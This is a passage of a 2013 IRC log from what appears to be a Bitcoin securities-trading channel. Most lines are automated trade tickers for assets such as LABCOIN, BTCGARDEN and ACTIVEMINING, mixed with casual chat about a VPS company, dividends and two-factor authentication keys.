[XBOND] 1350 @ 0.001 = 1.35 BTC [-] Aug 02 20:28:37 [HAVELOCK] [XBOND] 50 @ 0.001 = 0.05 BTC [-] **** BEGIN LOGGING AT Sat Aug 3 05:28:53 2013 Aug 03 05:29:34 congrats Namworld you have completely turned Bitvps around Aug 03 05:30:11 https://docs.google.com/spreadsheet/pub?key=0AvwwyRGyc1WgdDFvQWJnZnRZQWJfbk1mNHYtVzhPR0E&gid=1 - this has made my month end with a smile :D Aug 03 05:30:13 BitVPS Report Aug 03 05:30:21 give arij/phungus/d34th some credit Aug 03 05:30:27 fucking hole he had to pull it out of too Aug 03 05:30:36 [HAVELOCK] [XBOND] 20 @ 0.001 = 0.02 BTC [+] Aug 03 05:30:37 I do almost nothing Aug 03 05:30:46 Just PR/accounting/website Aug 03 05:31:01 [HAVELOCK] [HIM] 1 @ 0.132 BTC [+] Aug 03 05:31:15 [HAVELOCK] [HIM] 12 @ 0.131 = 1.572 BTC [-] Aug 03 05:31:32 I give you all credit but this made smile nice and wide today! Aug 03 05:31:45 phungus/d34th left but did work. Arij had most of the workload. Aug 03 05:32:04 Now it's just me and arij. phungus/d34th do occasional work. Aug 03 05:32:20 i give all of the bitvps team credit* Aug 03 05:33:53 [BTCTC] [LABCOIN] 552 @ 0.002 = 1.104 BTC [-] Aug 03 05:34:30 [BTCTC] [LABCOIN] 1000 @ 0.002062 = 2.062 BTC [+] Aug 03 05:34:32 [BTCTC] [LABCOIN] 1000 @ 0.002063 = 2.063 BTC [+] Aug 03 05:34:33 [BTCTC] [LABCOIN] 1000 @ 0.002064 = 2.064 BTC [+] Aug 03 05:34:34 [BTCTC] [LABCOIN] 2000 @ 0.002082 = 4.164 BTC [+] Aug 03 05:34:35 [BTCTC] [LABCOIN] 1000 @ 0.002083 = 2.083 BTC [+] Aug 03 05:34:36 [BTCTC] [LABCOIN] 300 @ 0.002084 = 0.6252 BTC [+] Aug 03 05:34:37 [BTCTC] [LABCOIN] 300 @ 0.00209 = 0.627 BTC [+] Aug 03 05:34:39 [BTCTC] [LABCOIN] 589 @ 0.002097 = 1.2351 BTC [+] Aug 03 05:34:40 [BTCTC] [LABCOIN] 4000 @ 0.0021 = 8.4 BTC [+] Aug 03 05:34:41 [BTCTC] [LABCOIN] 10000 @ 0.0021 = 21 BTC [+] Aug 03 05:35:35 [HAVELOCK] [XBOND] 330 @ 0.001 = 0.33 BTC [+] Aug 03 05:35:55 [HAVELOCK] [XBOND] 7 @ 0.001 = 0.007 BTC [+] Aug 03 05:40:46 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 03 05:42:19 [BTCTC] [ACTIVEMINING] 14 @ 0.006077 = 0.0851 BTC [-] Aug 03 05:42:21 [BTCTC] [ACTIVEMINING] 58 @ 0.006078 = 0.3525 BTC [+] Aug 03 05:42:23 [BTCTC] [ACTIVEMINING] 25 @ 0.006089 = 0.1522 BTC [+] Aug 03 05:42:25 [BTCTC] [ACTIVEMINING] 193 @ 0.00609 = 1.1754 BTC [+] Aug 03 05:42:31 [HAVELOCK] [AM100] 12 @ 0.0387999 = 0.4656 BTC [+] Aug 03 05:43:11 [HAVELOCK] [SMG] 1910 @ 0.000236 = 0.4508 BTC [-] Aug 03 05:43:42 i don't. i give Namworld all the credit because him i know. Aug 03 05:44:13 [BTCTC] [ACTIVEMINING] 1 @ 0.00609 BTC [+] Aug 03 05:44:24 [HAVELOCK] [AM100] 12 @ 0.0387999 = 0.4656 BTC [+] Aug 03 05:45:21 [HAVELOCK] [SMG] 6825 @ 0.000235 = 1.6039 BTC [-] Aug 03 05:45:36 [BTCTC] [LABCOIN] 3 @ 0.002132 = 0.0064 BTC [+] Aug 03 05:49:25 [BTCTC] [ACTIVEMINING] 16 @ 0.00609 = 0.0974 BTC [+] Aug 03 05:51:10 [BTCTC] [LABCOIN] 1 @ 0.002132 BTC [+] Aug 03 05:52:56 [BTCTC] [BTCGARDEN] 4070 @ 0.016 = 65.12 BTC [+] Aug 03 05:53:09 Eh, then my word should be enough to give em some credit too Aug 03 05:53:18 activemining dividend paid Aug 03 05:54:06 [HAVELOCK] [LABCO] 113 @ 0.0029 = 0.3277 BTC [+] Aug 03 05:54:22 http://trilema.com/2013/bitbet-july-2013-statement/ Aug 03 05:54:24 kakobrekla ^ Aug 03 05:54:28 BitBet, July 2013 Statement pe Trilema - Un blog de Mircea Popescu. Aug 03 05:54:36 Hollywood i don't get this. what are they paying dividends out of ? Aug 03 05:55:12 Namworld ok then :p Aug 03 05:55:51 [BTCTC] [TAT.ASICMINER] 5 @ 0.0389 = 0.1945 BTC [-] Aug 03 05:56:11 [BTCTC] [ASICMINER-PT] 5 @ 4.002 = 20.01 BTC [+] Aug 03 05:56:25 [BTCTC] [ACTIVEMINING] 5 @ 0.00609 = 0.0305 BTC [+] Aug 03 05:57:06 [BTCTC] [BTCGARDEN] 2500 @ 0.016 = 40 BTC [+] Aug 03 05:57:26 [HAVELOCK] [XBOND] 800 @ 0.001 = 0.8 BTC [+] Aug 03 05:57:54 [BTCTC] [LABCOIN] 4 @ 0.002131 = 0.0085 BTC [-] Aug 03 05:58:08 [BTCTC] [CRYPTO-TRADE] 5 @ 0.1997 = 0.9985 BTC [-] Aug 03 05:58:28 i dont know yet .i am trying to figure that out Aug 03 05:58:31 [BTCTC] [ACTIVEMINING] 1 @ 0.00609 BTC [+] Aug 03 05:58:58 namworld, excellent job Aug 03 05:59:06 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1951 = 0.3902 BTC [-] Aug 03 05:59:32 [BTCTC] [BITVPS] 30 @ 0.001899 = 0.057 BTC [+] Aug 03 05:59:32 [BTCTC] [BITVPS] 55 @ 0.001901 = 0.1046 BTC [+] Aug 03 05:59:34 [BTCTC] [ACTIVEMINING] 250 @ 0.00609 = 1.5225 BTC [+] Aug 03 05:59:43 [BTCTC] [ACTIVEMINING] 400 @ 0.00609 = 2.436 BTC [+] Aug 03 06:00:28 their profile says they have 6 avalons Aug 03 06:00:53 coz i was wondering same thing Aug 03 06:01:01 [BTCTC] [LABCOIN] 2 @ 0.002131 = 0.0043 BTC [-] Aug 03 06:01:25 [BTCTC] [LABCOIN] 996 @ 0.002132 = 2.1235 BTC [+] Aug 03 06:01:26 [BTCTC] [BASIC-MINING] 1 @ 0.4496 BTC [+] Aug 03 06:01:27 [BTCTC] [LABCOIN] 150 @ 0.002133 = 0.32 BTC [+] Aug 03 06:01:28 [BTCTC] [BASIC-MINING] 1 @ 0.4496 BTC [+] Aug 03 06:01:41 [BTCTC] [DMS.MINING] 1 @ 0.00997 BTC [-] Aug 03 06:02:15 [HAVELOCK] [AM100] 1 @ 0.0387999 BTC [+] Aug 03 06:03:04 https://www.btcguild.com/index.php?page=rankings§ion=teams tean amc Aug 03 06:03:06 BTC Guild - Bitcoin Mining Pool (97% PPLNS/92.5% PPS) Aug 03 06:03:08 *m Aug 03 06:04:00 [BTCTC] [BTCGARDEN] 3 @ 0.016 = 0.048 BTC [+] Aug 03 06:04:25 [BTCTC] [LABCOIN] 176 @ 0.002131 = 0.3751 BTC [-] Aug 03 06:04:35 [BTCTC] [ACTIVEMINING] 4 @ 0.00609 = 0.0244 BTC [+] Aug 03 06:05:03 [BTCTC] [TAT.MINIGAME] 1 @ 0.000257 BTC [+] Aug 03 06:06:17 [BTCTC] [LABCOIN] 80 @ 0.002135 = 0.1708 BTC [+] Aug 03 06:06:19 [BTCTC] [LABCOIN] 2000 @ 0.002167 = 4.334 BTC [+] Aug 03 06:07:16 [BTCTC] [ACTIVEMINING] 4 @ 0.00609 = 0.0244 BTC [+] Aug 03 06:07:56 can i use my mtgox yubikey at other places such as btc-tc Aug 03 06:08:54 [BTCTC] [S.MPOE-PT] 6 @ 0.0009398 = 0.0056 BTC [+] Aug 03 06:08:54 Use Google Auth, arij... Aug 03 06:09:10 d34th keeps wipiung my phone Aug 03 06:09:17 :P Aug 03 06:09:30 most likely no Aug 03 06:09:46 that's what the yubico support told me, but i have no first hand experience Aug 03 06:09:51 can i just buy a new yubikey? are they easy to set up? Aug 03 06:10:03 [BTCTC] [ACTIVEMINING] 10 @ 0.00609 = 0.0609 BTC [+] Aug 03 06:10:19 [BTCTC] [BTCGARDEN] 30 @ 0.016 = 0.48 BTC [+] Aug 03 06:10:48 [BTCTC] [LABCOIN] 2000 @ 0.00215 = 4.3 BTC [-] Aug 03 06:11:35 a new yubikey can be used without restrictions Aug 03 06:11:51 i think it's not to difficult ;) Aug 03 06:12:07 Awwww shit. KSlaughter is back from eAsic. Report coming ASAP. Hold on to your butts, kids. Aug 03 06:13:07 https://bitcointalk.org/index.php?topic=252531.msg2857678#msg2857678 Aug 03 06:13:12 [ActiveMining] The Official Active Mining Discussion Thread Aug 03 06:13:29 [BTCTC] [ACTIVEMINING] 1 @ 0.00609 BTC [+] Aug 03 06:13:42 [BTCTC] [ACTIVEMINING] 7 @ 0.00609 = 0.0426 BTC [+] Aug 03 06:14:35 [HAVELOCK] [XBOND] 10000 @ 0.001 = 10 BTC [+] Aug 03 06:17:28 [HAVELOCK] [XBOND] 8 @ 0.001 = 0.008 BTC [+] Aug 03 06:17:42 [BTCTC] [ACTIVEMINING] 320 @ 0.00609 = 1.9488 BTC [+] Aug 03 06:17:56 [BTCTC] [ACTIVEMINING] 244 @ 0.00609 = 1.486 BTC [+] Aug 03 06:19:06 [BTCTC] [ACTIVEMINING] 82 @ 0.006099 = 0.5001 BTC [+] Aug 03 06:19:13 [BTCTC] [BTCGARDEN] 35 @ 0.016 = 0.56 BTC [+] Aug 03 06:20:06 [BTCTC] [LABCOIN] 1 @ 0.00216 BTC [+] Aug 03 06:21:17 [BTCTC] [ACTIVEMINING] 88 @ 0.006099 = 0.5367 BTC [+] Aug 03 06:21:18 [BTCTC] [ACTIVEMINING] 1000 @ 0.0061 = 6.1 BTC [+] Aug 03 06:21:33 [BTCTC] [LABCOIN] 2232 @ 0.00216 = 4.8211 BTC [+] Aug 03 06:21:35 [BTCTC] [LABCOIN] 1000 @ 0.002189 = 2.189 BTC [+] Aug 03 06:21:36 [BTCTC] [LABCOIN] 600 @ 0.002189 = 1.3134 BTC [+] Aug 03 06:21:37 [BTCTC] [LABCOIN] 9000 @ 0.00219 = 19.71 BTC [+] Aug 03 06:23:00 [BTCTC] [BTCGARDEN] 560 @ 0.016 = 8.96 BTC [+] Aug 03 06:23:09 [BTCTC] [BTCGARDEN] 65 @ 0.016 = 1.04 BTC [+] Aug 03 06:23:58 www.edge-runner.com/2013/07/kickstarter-project-canceled-after-dude-spends-all-the-money/ Aug 03 06:24:32 [HAVELOCK] [XBOND] 151 @ 0.001 = 0.151 BTC [+] Aug 03 06:24:39 [BTCTC] [LABCOIN] 83 @ 0.002074 = 0.1721 BTC [-] Aug 03 06:24:40 [BTCTC] [LABCOIN] 20 @ 0.002073 = 0.0415 BTC [-] Aug 03 06:24:41 [BTCTC] [LABCOIN] 481 @ 0.002072 = 0.9966 BTC [-] Aug 03 06:24:42 [BTCTC] [LABCOIN] 166 @ 0.002071 = 0.3438 BTC [-] Aug 03 06:24:43 [BTCTC] [LABCOIN] 1000 @ 0.00207 = 2.07 BTC [-] Aug 03 06:24:44 [BTCTC] [LABCOIN] 201 @ 0.002061 = 0.4143 BTC [-] Aug 03 06:24:45 [BTCTC] [LABCOIN] 1210 @ 0.00206 = 2.4926 BTC [-] Aug 03 06:24:47 [BTCTC] [LABCOIN] 354 @ 0.002033 = 0.7197 BTC [-] Aug 03 06:24:48 [BTCTC] [LABCOIN] 2125 @ 0.002032 = 4.318 BTC [-] Aug 03 06:24:49 [BTCTC] [LABCOIN] 516 @ 0.002001 = 1.0325 BTC [-] Aug 03 06:24:50 [BTCTC] [LABCOIN] 3098 @ 0.002 = 6.196 BTC [-] Aug 03 06:30:13 [BTCTC] [PAJKA.BOND] 3 @ 0.02646 = 0.0794 BTC [+] Aug 03 06:34:06 [HAVELOCK] [HIM] 2 @ 0.16199998 = 0.324 BTC [+] Aug 03 06:34:45 pigeons no wai. this is possible with kickstarter projects ?!!?! ?! ?! Aug 03 06:35:18 and somehow magically all the "press" from end to end won't be running "OMG KICKSTARTER IS A SCAM" headlines tomorrow ? Aug 03 06:38:44 [BTCTC] [ACTIVEMINING] 30 @ 0.006141 = 0.1842 BTC [+] Aug 03 06:39:55 [BTCTC] [LABCOIN] 410 @ 0.002183 = 0.895 BTC [+] Aug 03 06:41:00 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 03 06:41:31 [HAVELOCK] [XBOND] 30 @ 0.001 = 0.03 BTC [+] Aug 03 06:41:53 [BTCTC] [ACTIVEMINING] 1 @ 0.00609 BTC [-] Aug 03 06:42:58 [BTCTC] [LABCOIN] 430 @ 0.002054 = 0.8832 BTC [-] Aug 03 06:42:59 [BTCTC] [LABCOIN] 2 @ 0.002053 = 0.0041 BTC [-] Aug 03 06:43:01 [BTCTC] [LABCOIN] 12 @ 0.002052 = 0.0246 BTC [-] Aug 03 06:43:02 [BTCTC] [LABCOIN] 16 @ 0.002051 = 0.0328 BTC [-] Aug 03 06:43:03 [BTCTC] [LABCOIN] 100 @ 0.00205 = 0.205 BTC [-] Aug 03 06:43:04 [BTCTC] [LABCOIN] 833 @ 0.002001 = 1.6668 BTC [-] Aug 03 06:43:05 [BTCTC] [LABCOIN] 2 @ 0.002 = 0.004 BTC [-] Aug 03 06:43:06 [BTCTC] [LABCOIN] 2435 @ 0.002 = 4.87 BTC [-] Aug 03 06:43:17 [BTCTC] [ACTIVEMINING] 87 @ 0.006141 = 0.5343 BTC [+] Aug 03 06:43:37 [HAVELOCK] [AM100] 113 @ 0.0368501 = 4.1641 BTC [-] Aug 03 06:43:40 [HAVELOCK] [AM100] 43 @ 0.03685 = 1.5846 BTC [-] Aug 03 06:43:42 [HAVELOCK] [AM100] 3 @ 0.03684 = 0.1105 BTC [-] Aug 03 06:43:44 [HAVELOCK] [AM100] 68 @ 0.03683 = 2.5044 BTC [-] Aug 03 06:43:46 [HAVELOCK] [AM100] 20 @ 0.03681 = 0.7362 BTC [-] Aug 03 06:43:48 [HAVELOCK] [AM100] 817 @ 0.0368 = 30.0656 BTC [-] Aug 03 06:44:01 [BTCTC] [ACTIVEMINING] 524 @ 0.006141 = 3.2179 BTC [+] Aug 03 06:45:02 [BTCTC] [ACTIVEMINING] 2 @ 0.006141 = 0.0123 BTC [+] Aug 03 06:45:18 [BTCTC] [COGNITIVE] 3 @ 0.49 = 1.47 BTC [+] Aug 03 06:45:20 [BTCTC] [ACTIVEMINING] 6 @ 0.006141 = 0.0368 BTC [+] Aug 03 06:45:50 [BTCTC] [ASICMINER-PT] 1 @ 4.044 BTC [+] Aug 03 06:47:06 [BTCTC] [LABCOIN] 470 @ 0.002155 = 1.0129 BTC [+] Aug 03 06:47:32 [BTCTC] [BTCGARDEN] 20000 @ 0.016 = 320 BTC [+] Aug 03 06:48:15 [BTCTC] [ACTIVEMINING] 47 @ 0.006141 = 0.2886 BTC [+] Aug 03 06:48:54 [BTCTC] [ASICMINER-PT] 1 @ 4.044 BTC [+] Aug 03 06:49:15 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 06:50:00 [BTCTC] [BTCGARDEN] 190 @ 0.016 = 3.04 BTC [+] Aug 03 06:50:38 [BTCTC] [BTCGARDEN] 20 @ 0.016 = 0.32 BTC [+] Aug 03 06:52:28 [BTCTC] [BTCGARDEN] 3 @ 0.016 = 0.048 BTC [+] Aug 03 06:53:33 [BTCTC] [BITVPS] 10 @ 0.001901 = 0.019 BTC [+] Aug 03 06:53:48 [BTCTC] [BTCGARDEN] 12 @ 0.016 = 0.192 BTC [+] Aug 03 06:53:59 [BTCTC] [BTCGARDEN] 15 @ 0.016 = 0.24 BTC [+] Aug 03 06:54:20 [BTCTC] [LABCOIN] 16 @ 0.002006 = 0.0321 BTC [-] Aug 03 06:54:37 [BTCTC] [TAT.MINIGAME] 3 @ 0.0002705 = 0.0008 BTC [+] Aug 03 06:56:11 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 06:56:29 [BTCTC] [BTCGARDEN] 870 @ 0.016 = 13.92 BTC [+] Aug 03 06:56:49 [BTCTC] [BTCGARDEN] 314 @ 0.016 = 5.024 BTC [+] Aug 03 06:58:59 [BTCTC] [ACTIVEMINING] 106 @ 0.0061 = 0.6466 BTC [-] Aug 03 07:00:26 [BTCTC] [ACTIVEMINING] 119 @ 0.006126 = 0.729 BTC [+] Aug 03 07:00:36 [BTCTC] [BTCGARDEN] 4022 @ 0.016 = 64.352 BTC [+] Aug 03 07:00:47 [BTCTC] [ACTIVEMINING] 106 @ 0.006142 = 0.6511 BTC [+] Aug 03 07:01:16 [BTCTC] [ACTIVEMINING] 93 @ 0.006175 = 0.5743 BTC [+] Aug 03 07:01:38 [BTCTC] [ACTIVEMINING] 99 @ 0.006199 = 0.6137 BTC [+] Aug 03 07:02:09 [BTCTC] [ACTIVEMINING] 100 @ 0.0062 = 0.62 BTC [+] Aug 03 07:02:19 [BTCTC] [BTCGARDEN] 900 @ 0.016 = 14.4 BTC [+] Aug 03 07:02:37 [BTCTC] [ACTIVEMINING] 93 @ 0.00621 = 0.5775 BTC [+] Aug 03 07:03:02 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 07:04:14 [BTCTC] [ASICMINER-PT] 1 @ 4.001 BTC [-] Aug 03 07:04:26 [BTCTC] [ACTIVEMINING] 63 @ 0.006022 = 0.3794 BTC [-] Aug 03 07:04:27 [BTCTC] [ACTIVEMINING] 25 @ 0.006021 = 0.1505 BTC [-] Aug 03 07:04:39 [BTCTC] [ACTIVEMINING] 12 @ 0.006021 = 0.0723 BTC [-] Aug 03 07:04:40 [BTCTC] [ACTIVEMINING] 19 @ 0.006263 = 0.119 BTC [+] Aug 03 07:04:58 [BTCTC] [LABCOIN] 200 @ 0.00201 = 0.402 BTC [+] Aug 03 07:05:17 [BTCTC] [BTCGARDEN] 275 @ 0.016 = 4.4 BTC [+] Aug 03 07:05:28 [BTCTC] [BTCGARDEN] 1450 @ 0.016 = 23.2 BTC [+] Aug 03 07:06:27 [BTCTC] [BTCGARDEN] 38 @ 0.016 = 0.608 BTC [+] Aug 03 07:06:29 [HAVELOCK] [AM100] 3 @ 0.0368 = 0.1104 BTC [-] Aug 03 07:07:35 [BTCTC] [ACTIVEMINING] 8 @ 0.006262 = 0.0501 BTC [-] Aug 03 07:08:17 [HAVELOCK] [XBOND] 5 @ 0.001 = 0.005 BTC [+] Aug 03 07:08:21 [BTCTC] [TAT.ASICMINER] 5 @ 0.0389 = 0.1945 BTC [-] Aug 03 07:08:23 [BTCTC] [TAT.ASICMINER] 13 @ 0.0389 = 0.5057 BTC [-] Aug 03 07:09:14 [BTCTC] [BTCGARDEN] 2089 @ 0.016 = 33.424 BTC [+] Aug 03 07:10:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.0389 = 0.0778 BTC [-] Aug 03 07:11:40 [BTCTC] [BTCGARDEN] 25 @ 0.016 = 0.4 BTC [+] Aug 03 07:11:54 [BTCTC] [BTCGARDEN] 1150 @ 0.016 = 18.4 BTC [+] Aug 03 07:12:29 [BTCTC] [BTCGARDEN] 11 @ 0.016 = 0.176 BTC [+] Aug 03 07:13:02 [HAVELOCK] [XBOND] 1000 @ 0.001 = 1 BTC [+] Aug 03 07:14:28 [BTCTC] [ACTIVEMINING] 5 @ 0.006257 = 0.0313 BTC [-] Aug 03 07:14:55 [HAVELOCK] [XBOND] 50 @ 0.001 = 0.05 BTC [+] Aug 03 07:14:58 [BTCTC] [BTCGARDEN] 1620 @ 0.016 = 25.92 BTC [+] Aug 03 07:15:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.0387 BTC [-] Aug 03 07:19:29 [BTCTC] [BTCGARDEN] 1240 @ 0.016 = 19.84 BTC [+] Aug 03 07:20:19 [HAVELOCK] [AM100] 33 @ 0.0368 = 1.2144 BTC [-] Aug 03 07:21:58 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 03 07:24:32 [BTCTC] [TAT.ASICMINER] 15 @ 0.0385 = 0.5775 BTC [-] Aug 03 07:25:16 [BTCTC] [BTCGARDEN] 6840 @ 0.016 = 109.44 BTC [+] Aug 03 07:26:48 [BTCTC] [BTCGARDEN] 11 @ 0.016 = 0.176 BTC [+] Aug 03 07:27:05 [BTCTC] [BTCGARDEN] 201 @ 0.016 = 3.216 BTC [+] Aug 03 07:27:35 [BTCTC] [BTCGARDEN] 48 @ 0.016 = 0.768 BTC [+] Aug 03 07:28:02 [BTCTC] [LABCOIN] 227 @ 0.002109 = 0.4787 BTC [+] Aug 03 07:28:02 [BTCTC] [LABCOIN] 773 @ 0.00211 = 1.631 BTC [+] Aug 03 07:30:53 [BTCTC] [ACTIVEMINING] 7 @ 0.006201 = 0.0434 BTC [-] Aug 03 07:31:07 [BTCTC] [ACTIVEMINING] 2 @ 0.0062 = 0.0124 BTC [-] Aug 03 07:31:29 [BTCTC] [ACTIVEMINING] 348 @ 0.006153 = 2.1412 BTC [-] Aug 03 07:32:02 [BTCTC] [ASICMINER-PT] 1 @ 3.996 BTC [-] Aug 03 07:33:51 [HAVELOCK] [XBOND] 100 @ 0.001 = 0.1 BTC [+] Aug 03 07:36:36 [BTCTC] [BTCGARDEN] 18 @ 0.016 = 0.288 BTC [+] Aug 03 07:40:30 [HAVELOCK] [XBOND] 7130 @ 0.001 = 7.13 BTC [+] Aug 03 07:40:43 [HAVELOCK] [XBOND] 38010 @ 0.001 = 38.01 BTC [+] Aug 03 07:41:30 [HAVELOCK] [XBOND] 100000 @ 0.001 = 100 BTC [+] Aug 03 07:41:53 [HAVELOCK] [XBOND] 212 @ 0.001 = 0.212 BTC [+] Aug 03 07:42:17 [00:38] <+AssetBot> [ActiveMining] 1 @ 0.00628799 = 0.00628799 [+] Aug 03 07:42:17 [00:39] <+AssetBot> [btcQuick] 2800 @ 0.00039790 = 1.11412000 [-] Aug 03 07:42:17 [00:39] you can become a citizen of Belize if you invest $50K US Aug 03 07:42:17 [00:40] did someone just buy 1 share to ego boost? Aug 03 07:42:28 [HAVELOCK] [AM100] 10 @ 0.0386 = 0.386 BTC [+] Aug 03 07:42:38 arg, was not supposed to autopaste the whole thing. Aug 03 07:42:43 Rgardless... Aug 03 07:42:59 Some have an odd definition of ego Aug 03 07:43:15 [HAVELOCK] [XBOND] 3600 @ 0.001 = 3.6 BTC [+] Aug 03 07:43:43 [BTCTC] [BTCGARDEN] 250 @ 0.016 = 4 BTC [+] Aug 03 07:43:59 [HAVELOCK] [AM100] 147 @ 0.0387999 = 5.7036 BTC [+] Aug 03 07:44:51 [HAVELOCK] [AM100] 10 @ 0.0388 = 0.388 BTC [+] Aug 03 07:46:02 [HAVELOCK] [AM100] 146 @ 0.0388799 = 5.6765 BTC [+] Aug 03 07:46:23 [HAVELOCK] [XBOND] 275 @ 0.000983 = 0.2703 BTC [-] Aug 03 07:46:28 [BTCTC] [BTCGARDEN] 125 @ 0.016 = 2 BTC [+] Aug 03 07:46:30 [HAVELOCK] [AM100] 87 @ 0.03888 = 3.3826 BTC [+] Aug 03 07:48:13 [BTCTC] [ACTIVEMINING] 5 @ 0.006244 = 0.0312 BTC [+] Aug 03 07:48:42 [BTCTC] [BTCGARDEN] 5645 @ 0.016 = 90.32 BTC [+] Aug 03 07:50:42 [HAVELOCK] [XBOND] 938 @ 0.000999 = 0.9371 BTC [+] Aug 03 07:51:38 "Posterity will hardly believe that the Queen of England, granddaughter of Aug 03 07:51:38 Henri the Great, wanted a fagot to light a fire in the month of January, Aug 03 07:51:38 in the Louvre, and at the Court of France." Aug 03 07:51:42 great quote of the day. Aug 03 07:51:51 [BTCTC] [TAT.ASICMINER] 8 @ 0.03867 = 0.3094 BTC [+] Aug 03 07:51:51 [BTCTC] [TAT.ASICMINER] 30 @ 0.03868 = 1.1604 BTC [+] Aug 03 07:51:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.03868 = 0.0774 BTC [+] Aug 03 07:51:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.03869 = 0.1935 BTC [+] Aug 03 07:51:55 [BTCTC] [TAT.ASICMINER] 15 @ 0.03989 = 0.5984 BTC [+] Aug 03 07:53:08 [BTCTC] [BTCGARDEN] 40 @ 0.016 = 0.64 BTC [+] Aug 03 07:53:14 [BTCTC] [BTCGARDEN] 400 @ 0.016 = 6.4 BTC [+] Aug 03 07:55:02 [BTCTC] [TAT.MINIGAME] 1 @ 0.000242 BTC [-] Aug 03 07:55:13 [BTCTC] [ASICMINER-PT] 1 @ 4.002 BTC [+] Aug 03 07:55:16 [BTCTC] [ASICMINER-PT] 1 @ 4.001 BTC [-] Aug 03 07:55:18 [BTCTC] [ASICMINER-PT] 8 @ 4 = 32 BTC [-] Aug 03 07:56:26 hey mircea_popescu this is a weird question but Aug 03 07:56:35 [BTCTC] [BTCGARDEN] 2487 @ 0.016 = 39.792 BTC [+] Aug 03 07:56:37 is there a list of your best insults? Aug 03 07:57:07 [BTCTC] [BTCGARDEN] 525 @ 0.016 = 8.4 BTC [+] Aug 03 07:57:28 like: You know, just the new kid on the baseball team makes a proposal to go get drunk the night before the game. Just a proposal. Aug 03 07:57:38 or one of my favorites: It.s a wonder you manage to find the keyboard. Aug 03 07:57:46 lol Aug 03 07:58:39 [BTCTC] [ACTIVEMINING] 58 @ 0.006262 = 0.3632 BTC [+] Aug 03 07:58:41 [BTCTC] [ACTIVEMINING] 481 @ 0.006263 = 3.0125 BTC [+] Aug 03 07:58:42 [BTCTC] [ACTIVEMINING] 8561 @ 0.0063 = 53.9343 BTC [+] Aug 03 07:58:49 [BTCTC] [BTCGARDEN] 170 @ 0.016 = 2.72 BTC [+] Aug 03 07:59:28 [BTCTC] [BTCGARDEN] 10054 @ 0.016 = 160.864 BTC [+] Aug 03 08:00:09 [HAVELOCK] [AM100] 12 @ 0.0379 = 0.4548 BTC [-] Aug 03 08:00:36 [BTCTC] [LABCOIN] 66 @ 0.002106 = 0.139 BTC [-] Aug 03 08:00:37 [BTCTC] [LABCOIN] 400 @ 0.002107 = 0.8428 BTC [+] Aug 03 08:00:38 [BTCTC] [LABCOIN] 157 @ 0.002109 = 0.3311 BTC [+] Aug 03 08:00:40 [BTCTC] [LABCOIN] 227 @ 0.00211 = 0.479 BTC [+] Aug 03 08:00:41 [BTCTC] [LABCOIN] 700 @ 0.00211 = 1.477 BTC [+] Aug 03 08:00:42 [BTCTC] [LABCOIN] 100 @ 0.00211 = 0.211 BTC [+] Aug 03 08:01:07 [BTCTC] [ASICMINER-PT] 3 @ 4.04 = 12.12 BTC [+] Aug 03 08:01:37 [BTCTC] [ASICMINER-PT] 1 @ 4.046 BTC [+] Aug 03 08:01:46 [BTCTC] [BTCGARDEN] 210 @ 0.016 = 3.36 BTC [+] Aug 03 08:01:49 [HAVELOCK] [XBOND] 270 @ 0.000999 = 0.2697 BTC [+] Aug 03 08:02:18 [BTCTC] [ACTIVEMINING] 25 @ 0.006299 = 0.1575 BTC [-] Aug 03 08:02:19 [BTCTC] [ACTIVEMINING] 475 @ 0.006299 = 2.992 BTC [-] Aug 03 08:02:37 [BTCTC] [TAT.ASICMINER] 6 @ 0.03987 = 0.2392 BTC [-] Aug 03 08:02:52 lol Aug 03 08:02:54 [HAVELOCK] [AM100] 10 @ 0.0368 = 0.368 BTC [-] Aug 03 08:02:56 [HAVELOCK] [AM100] 1 @ 0.0367 BTC [-] Aug 03 08:02:59 [HAVELOCK] [AM100] 40 @ 0.0366 = 1.464 BTC [-] Aug 03 08:03:00 [HAVELOCK] [AM100] 8 @ 0.0366 = 0.2928 BTC [-] Aug 03 08:03:03 [HAVELOCK] [AM100] 10 @ 0.0366 = 0.366 BTC [-] Aug 03 08:03:04 [HAVELOCK] [AM100] 43 @ 0.0365 = 1.5695 BTC [-] Aug 03 08:03:07 [BTCTC] [TAT.ASICMINER] 50 @ 0.03988 = 1.994 BTC [+] Aug 03 08:03:11 well, not that i know. but now there's a 1 btc bounty for a top 20 of my best insults. Aug 03 08:03:24 [BTCTC] [TAT.ASICMINER] 30 @ 0.0399 = 1.197 BTC [+] Aug 03 08:03:48 do the two I just posted count? Aug 03 08:03:59 i dunno, up to whoever makes the list Aug 03 08:04:44 [BTCTC] [ASICMINER-PT] 1 @ 4.046 BTC [+] Aug 03 08:04:46 [BTCTC] [ASICMINER-PT] 1 @ 4.047 BTC [+] Aug 03 08:04:47 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [+] Aug 03 08:04:53 [BTCTC] [LABCOIN] 271 @ 0.002011 = 0.545 BTC [-] Aug 03 08:04:55 [BTCTC] [LABCOIN] 815 @ 0.00201 = 1.6382 BTC [-] Aug 03 08:04:56 [BTCTC] [LABCOIN] 541 @ 0.00201 = 1.0874 BTC [-] Aug 03 08:04:57 [BTCTC] [LABCOIN] 1 @ 0.002119 BTC [+] Aug 03 08:05:14 [BTCTC] [BTCGARDEN] 421 @ 0.016 = 6.736 BTC [+] Aug 03 08:06:12 [BTCTC] [BTCGARDEN] 3000 @ 0.016 = 48 BTC [+] Aug 03 08:06:22 [BTCTC] [TAT.ASICMINER] 25 @ 0.0385 = 0.9625 BTC [-] Aug 03 08:07:18 [BTCTC] [BTCGARDEN] 215 @ 0.016 = 3.44 BTC [+] Aug 03 08:08:12 [BTCTC] [LABCOIN] 15 @ 0.002119 = 0.0318 BTC [+] Aug 03 08:08:13 [BTCTC] [LABCOIN] 100 @ 0.00212 = 0.212 BTC [+] Aug 03 08:08:15 [BTCTC] [LABCOIN] 33 @ 0.002153 = 0.071 BTC [+] Aug 03 